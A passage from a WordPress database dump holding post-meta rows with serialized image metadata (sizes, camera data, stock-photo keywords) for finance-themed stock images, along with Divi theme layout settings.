_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:56:\"2023/03/credit-score-screen-of-smartphone-1000x667-1.jpg\";s:8:\"filesize\";i:432336;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35866;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28922;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75244;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41949;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44028;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54292;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54065;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98497;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:56:\"credit-score-screen-of-smartphone-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49110;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.5\";s:6:\"credit\";s:32:\"Song_about_summer - stock.adobe.\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:94:\"credit score concept on the screen of smartphone, checking payment history and ranking in bank\";s:17:\"created_timestamp\";s:10:\"1381598399\";s:9:\"copyright\";s:11:\"Anya Berkut\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:64:\"credit score concept on the screen of smartphone, checking payme\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:48:{i:0;s:4:\"owed\";i:1;s:7:\"history\";i:2;s:7:\"payment\";i:3;s:4:\"hand\";i:4;s:10:\"smartphone\";i:5;s:8:\"internet\";i:6;s:5:\"phone\";i:7;s:6:\"mobile\";i:8;s:11:\"application\";i:9;s:7:\"banking\";i:10;s:9:\"borrowing\";i:11;s:8:\"business\";i:12;s:4:\"card\";i:13;s:5:\"check\";i:14;s:8:\"computer\";i:15;s:7:\"concept\";i:16;s:6:\"credit\";i:17;s:12:\"credit score\";i:18;s:8:\"customer\";i:19;s:4:\"data\";i:20;s:4:\"debt\";i:21;s:7:\"digital\";i:22;s:7:\"display\";i:23;s:9:\"excellent\";i:24;s:7:\"finance\";i:25;s:9:\"financial\";i:26;s:4:\"form\";i:27;s:4:\"good\";i:28;s:6:\"laptop\";i:29;s:4:\"loan\";i:30;s:3:\"man\";i:31;s:5:\"money\";i:32;s:10:\"monitoring\";i:33;s:8:\"mortgage\";i:34;s:6:\"online\";i:35;s:6:\"people\";i:36;s:11:\"performance\";i:37;s:6:\"person\";i:38;s:8:\"personal\";i:39;s:7:\"ranking\";i:40;s:6:\"rating\";i:41;s:6:\"record\";i:42;s:5:\"repay\";i:43;s:6:\"report\";i:44;s:5:\"score\";i:45;s:6:\"screen\";i:46;s:8:\"thinking\";i:47;s:5:\"using\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(981,303,'_wp_attached_file','2023/03/For-Sale-1000x669-1.jpg'),(982,303,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:669;s:4:\"file\";s:31:\"2023/03/For-Sale-1000x669-1.jpg\";s:8:\"filesize\";i:353635;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27915;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21219;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64685;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33339;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35167;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44796;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45846;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-980x656.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85260;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:31:\"For-Sale-1000x669-1-480x321.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40304;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:31:\"Richard Thorp - stock.adobe.com\";s:6:\"camera\";s:10:\"NIKON D200\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1160146305\";s:9:\"copyright\";s:33:\"©Richard Thorp - stock.adobe.com\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00025\";s:5:\"title\";s:36:\"sold sign in front of house or condo\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:30:{i:0;s:4:\"sign\";i:1;s:4:\"sale\";i:2;s:4:\"sell\";i:3;s:11:\"real estate\";i:4;s:4:\"home\";i:5;s:5:\"house\";i:6;s:6:\"market\";i:7;s:8:\"commerce\";i:8;s:8:\"business\";i:9;s:7:\"success\";i:10;s:5:\"close\";i:11;s:6:\"escrow\";i:12;s:5:\"white\";i:13;s:4:\"post\";i:14;s:5:\"board\";i:15;s:6:\"notice\";i:16;s:4:\"move\";i:17;s:4:\"rent\";i:18;s:8:\"mortgage\";i:19;s:4:\"deal\";i:20;s:9:\"negotiate\";i:21;s:8:\"contract\";i:22;s:9:\"signature\";i:23;s:5:\"final\";i:24;s:5:\"condo\";i:25;s:11:\"town  house\";i:26;s:5:\"mover\";i:27;s:6:\"moving\";i:28;s:4:\"sold\";i:29;s:11:\"transaction\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"74\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(983,304,'_wp_attached_file','2023/03/Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1.jpg'),(984,304,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:78:\"2023/03/Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1.jpg\";s:8:\"filesize\";i:434584;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36905;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28855;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86020;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43965;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46676;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59194;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57919;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115379;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:78:\"Woman-paying-utility-bills-online-using-laptop-computer-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52805;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:29:\"shurkin_son - stock.adobe.com\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:190:\"Candid shot of focused beautiful young African housewife wearing headband and casual shirt paying utility bills online using laptop computer, sitting at kitchen table with papers and smiling\";s:17:\"created_timestamp\";s:10:\"1532514375\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:190:\"Candid shot of focused beautiful young African housewife wearing headband and casual shirt paying utility bills online using laptop computer, sitting at kitchen table with papers and smiling\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:6:\"laptop\";i:1;s:6:\"female\";i:2;s:7:\"indoors\";i:3;s:6:\"person\";i:4;s:6:\"paying\";i:5;s:7:\"african\";i:6;s:8:\"computer\";i:7;s:7:\"finance\";i:8;s:4:\"home\";i:9;s:10:\"technology\";i:10;s:5:\"young\";i:11;s:5:\"black\";i:12;s:4:\"bill\";i:13;s:6:\"people\";i:14;s:5:\"adult\";i:15;s:9:\"beautiful\";i:16;s:9:\"paperwork\";i:17;s:5:\"woman\";i:18;s:8:\"american\";i:19;s:6:\"budget\";i:20;s:10:\"calculator\";i:21;s:9:\"financial\";i:22;s:4:\"girl\";i:23;s:5:\"house\";i:24;s:5:\"money\";i:25;s:6:\"online\";i:26;s:8:\"internet\";i:27;s:8:\"portrait\";i:28;s:5:\"using\";i:29;s:4:\"debt\";i:30;s:5:\"women\";i:31;s:4:\"bank\";i:32;s:7:\"banking\";i:33;s:6:\"casual\";i:34;s:5:\"check\";i:35;s:6:\"papers\";i:36;s:4:\"room\";i:37;s:7:\"savings\";i:38;s:5:\"table\";i:39;s:5:\"happy\";i:40;s:7:\"payment\";i:41;s:7:\"sitting\";i:42;s:8:\"counting\";i:43;s:7:\"holding\";i:44;s:7:\"kitchen\";i:45;s:9:\"copyspace\";i:46;s:9:\"apartment\";i:47;s:9:\"documents\";i:48;s:3:\"pay\";i:49;s:4:\"work\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(985,305,'_wp_attached_file','2023/03/Burial-Insurance-1000x667-1.jpg'),(986,305,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:39:\"2023/03/Burial-Insurance-1000x667-1.jpg\";s:8:\"filesize\";i:528943;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32209;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24687;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86356;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39739;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42239;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56316;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56646;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123561;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:39:\"Burial-Insurance-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48618;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"20\";s:6:\"credit\";s:32:\"Vitalii Vodolazskyi - stock.adob\";s:6:\"camera\";s:7:\"SLT-A65\";s:7:\"caption\";s:51:\"Burial Insurance memo on the green sheet and money.\";s:17:\"created_timestamp\";s:10:\"1579615261\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:3:\"0.4\";s:5:\"title\";s:51:\"Burial Insurance memo on the green sheet and money.\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:20:{i:0;s:6:\"burial\";i:1;s:9:\"insurance\";i:2;s:7:\"funeral\";i:3;s:5:\"death\";i:4;s:4:\"form\";i:5;s:11:\"application\";i:6;s:12:\"compensation\";i:7;s:8:\"mourning\";i:8;s:5:\"claim\";i:9;s:5:\"costs\";i:10;s:6:\"policy\";i:11;s:8:\"document\";i:12;s:7:\"payment\";i:13;s:9:\"provident\";i:14;s:4:\"fund\";i:15;s:6:\"saving\";i:16;s:8:\"planning\";i:17;s:7:\"finance\";i:18;s:4:\"life\";i:19;s:8:\"benefits\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"76\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(987,306,'_edit_lock','1679247902:3'),(988,306,'_edit_last','3'),(989,306,'_thumbnail_id','298'),(990,306,'_et_post_bg_color','#ffffff'),(991,306,'_et_post_bg_layout','light'),(992,306,'_et_pb_show_title','on'),(993,306,'_et_pb_post_hide_nav','default'),(994,306,'_et_pb_page_layout','et_right_sidebar'),(995,306,'_et_pb_side_nav','off'),(1000,306,'_et_pb_use_builder',''),(1001,306,'_et_pb_first_image',''),(1002,306,'_et_pb_truncate_post',''),(1003,306,'_et_pb_truncate_post_date',''),(1004,306,'_et_pb_old_content',''),(1007,311,'_thumbnail_id','223'),(1006,311,'_edit_last','3'),(1005,311,'_edit_lock','1679247927:3'),(1008,311,'_et_post_bg_color','#ffffff'),(1009,311,'_et_post_bg_layout','light'),(1010,311,'_et_pb_show_title','on'),(1011,311,'_et_pb_post_hide_nav','default'),(1012,311,'_et_pb_page_layout','et_right_sidebar'),(1013,311,'_et_pb_side_nav','off'),(1019,311,'_et_pb_use_builder',''),(1020,311,'_et_pb_first_image',''),(1021,311,'_et_pb_truncate_post',''),(1022,311,'_et_pb_truncate_post_date',''),(1023,311,'_et_pb_old_content',''),(1039,315,'_et_pb_truncate_post_date',''),(1025,315,'_edit_last','3'),(1024,315,'_edit_lock','1679247958:3'),(1036,315,'_et_pb_use_builder',''),(1037,315,'_et_pb_first_image',''),(1038,315,'_et_pb_truncate_post',''),(1042,318,'_edit_last','3'),(1041,318,'_edit_lock','1679247986:3'),(1043,318,'_thumbnail_id','300'),(1044,318,'_et_post_bg_color','#ffffff'),(1045,318,'_et_post_bg_layout','light'),(1046,318,'_et_pb_show_title','on'),(1047,318,'_et_pb_post_hide_nav','default'),(1048,318,'_et_pb_page_layout','et_right_sidebar'),(1049,318,'_et_pb_side_nav','off'),(1054,318,'_et_pb_use_builder',''),(1055,318,'_et_pb_first_image',''),(1056,318,'_et_pb_truncate_post',''),(1057,318,'_et_pb_truncate_post_date',''),(1058,318,'_et_pb_old_content',''),(1060,321,'_edit_last','3'),(1059,321,'_edit_lock','1679248017:3'),(1468,416,'_et_post_bg_color','#ffffff'),(1469,416,'_et_post_bg_layout','light'),(1470,416,'_et_pb_show_title','on'),(1471,416,'_et_pb_post_hide_nav','default'),(1064,321,'_thumbnail_id','301'),(1065,321,'_et_post_bg_color','#ffffff'),(1066,321,'_et_post_bg_layout','light'),(1067,321,'_et_pb_show_title','on'),(1068,321,'_et_pb_post_hide_nav','default'),(1069,321,'_et_pb_page_layout','et_right_sidebar'),(1070,321,'_et_pb_side_nav','off'),(1074,321,'_et_pb_use_builder',''),(1075,321,'_et_pb_first_image',''),(1076,321,'_et_pb_truncate_post',''),(1077,321,'_et_pb_truncate_post_date',''),(1078,321,'_et_pb_old_content',''),(1081,324,'_thumbnail_id','302'),(1080,324,'_edit_last','3'),(1079,324,'_edit_lock','1679248047:3'),(1082,324,'_et_post_bg_color','#ffffff'),(1083,324,'_et_post_bg_layout','light'),(1084,324,'_et_pb_show_title','on'),(1085,324,'_et_pb_post_hide_nav','default'),(1086,324,'_et_pb_page_layout','et_right_sidebar'),(1087,324,'_et_pb_side_nav','off'),(1092,324,'_et_pb_use_builder',''),(1093,324,'_et_pb_first_image',''),(1094,324,'_et_pb_truncate_post',''),(1095,324,'_et_pb_truncate_post_date',''),(1096,324,'_et_pb_old_content',''),(1098,327,'_edit_last','3'),(1097,327,'_edit_lock','1679248070:3'),(1376,57,'_et_pb_old_content',''),(1372,57,'_et_pb_use_builder',''),(1373,57,'_et_pb_first_image',''),(1374,57,'_et_pb_truncate_post',''),(1375,57,'_et_pb_truncate_post_date',''),(1138,337,'_wp_attached_file','2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-scaled.jpg'),(1139,337,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:2412;s:4:\"file\";s:65:\"2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-scaled.jpg\";s:8:\"filesize\";i:199883;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26902;}s:5:\"large\";a:5:{s:4:\"file\";s:59:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-1024x965.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:965;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69727;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20145;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-768x724.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53021;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:60:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-1536x1447.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1447;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106782;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:60:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-2048x1929.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1929;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149775;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28677;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:59:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60541;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29933;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36203;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:60:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-1080x1017.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1017;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73010;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36563;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:60:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-2866x1800.jpg\";s:5:\"width\";i:2866;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187127;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:60:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-1280x1206.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1206;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86902;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-980x923.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:923;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67080;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:58:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-480x452.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36456;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:26:\"Teerapat - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:49:{i:0;s:4:\"tips\";i:1;s:1:\"5\";i:2;s:3:\"top\";i:3;s:4:\"good\";i:4;s:6:\"advice\";i:5;s:12:\"illustration\";i:6;s:10:\"background\";i:7;s:5:\"badge\";i:8;s:6:\"banner\";i:9;s:6:\"bubble\";i:10;s:4:\"bulb\";i:11;s:8:\"business\";i:12;s:7:\"concept\";i:13;s:8:\"creative\";i:14;s:10:\"creativity\";i:15;s:6:\"design\";i:16;s:9:\"education\";i:17;s:6:\"energy\";i:18;s:6:\"eureka\";i:19;s:4:\"flat\";i:20;s:7:\"graphic\";i:21;s:4:\"help\";i:22;s:7:\"helpful\";i:23;s:4:\"icon\";i:24;s:4:\"idea\";i:25;s:9:\"incentive\";i:26;s:4:\"info\";i:27;s:11:\"information\";i:28;s:10:\"innovation\";i:29;s:11:\"inspiration\";i:30;s:8:\"isolated\";i:31;s:4:\"lamp\";i:32;s:5:\"learn\";i:33;s:5:\"light\";i:34;s:7:\"message\";i:35;s:4:\"note\";i:36;s:5:\"quick\";i:37;s:7:\"service\";i:38;s:4:\"sign\";i:39;s:8:\"solution\";i:40;s:6:\"speech\";i:41;s:7:\"success\";i:42;s:10:\"suggestion\";i:43;s:6:\"symbol\";i:44;s:4:\"text\";i:45;s:5:\"think\";i:46;s:5:\"trick\";i:47;s:6:\"vector\";i:48;s:5:\"white\";}}s:14:\"original_image\";s:50:\"5-Good-Tips-Thought-bubble-Cropped-2866x2700-1.jpg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:100;s:4:\"webp\";i:0;}}'),(1107,327,'_thumbnail_id','303'),(1108,327,'_et_post_bg_color','#ffffff'),(1109,327,'_et_post_bg_layout','light'),(1110,327,'_et_pb_show_title','on'),(1111,327,'_et_pb_post_hide_nav','default'),(1112,327,'_et_pb_page_layout','et_right_sidebar'),(1113,327,'_et_pb_side_nav','off'),(1117,327,'_et_pb_use_builder',''),(1118,327,'_et_pb_first_image',''),(1119,327,'_et_pb_truncate_post',''),(1120,327,'_et_pb_truncate_post_date',''),(1121,327,'_et_pb_old_content',''),(1124,333,'_thumbnail_id','304'),(1123,333,'_edit_last